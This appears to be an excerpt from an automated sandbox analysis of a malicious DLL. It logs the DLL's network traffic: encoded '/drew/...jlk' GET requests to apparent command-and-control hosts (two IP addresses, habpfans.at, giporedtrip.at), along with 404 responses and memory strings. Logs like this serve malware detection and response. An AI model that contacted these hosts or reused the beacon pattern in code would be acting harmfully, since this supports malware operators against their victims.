3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:04:33 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:04:54 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:05:34 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:05:55 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:06:17 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 26 Jan 2022 16:06:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 548Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 194.76.226.200
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: unknown TCP traffic detected without corresponding DNS query: 31.214.157.187
Source: loaddll32.exe, 00000000.00000003.750161784.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://194214.157.187/
Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.214.157.187/
Source: loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.214.157.187/drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8
Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/
Source: loaddll32.exe, 00000000.00000002.776884531.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/8
Source: loaddll32.exe, 00000000.00000002.777186188.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.772898305.0000000000AB4000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/drew/8aMvIN0oJqk/wfo22krGhemAS6/6H_2FPRAH0bqwevjC8Pk5/kXre7OAlPZjP7YB8/
Source: loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://config.edge.skype.com/drew/cmlyVQ2zwKm8fCRpP0VB/i6Zv1FcucRsB3XE0xRC/6VGWBAMEz_2Fh6VbcTZ9sL/wE
Source: WerFault.exe, 00000007.00000002.314858058.00000000049C9000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312995086.00000000049C8000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.312888145.00000000049C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.777131845.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438896118.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.773036185.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://habpfans.at/
Source: loaddll32.exe, 00000000.00000003.439117348.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000003.438919060.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w
Source: loaddll32.exe, 00000000.00000003.750136886.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/
Source: loaddll32.exe, 00000000.00000003.750126035.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://habpfans.at/g
Source: Amcache.hve.7.dr String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll String found in binary or memory: http://www.dhtmlcentral.com/forums/forum.asp?FORUM_ID=2&CAT_ID=1&Forum_Title=CoolMenus
Source: loaddll32.exe, 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp, hFGZpat9Mf.dll String found in binary or memory: http://www.dhtmlcentral.com/tutorial.asp
Source: unknown DNS traffic detected: queries for: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
Source: global traffic HTTP traffic detected: GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: giporedtrip.at
Source: global traffic HTTP traffic detected: GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: habpfans.at
Source: global traffic HTTP traffic detected: GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 31.214.157.187
Source: global traffic HTTP traffic detected: GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
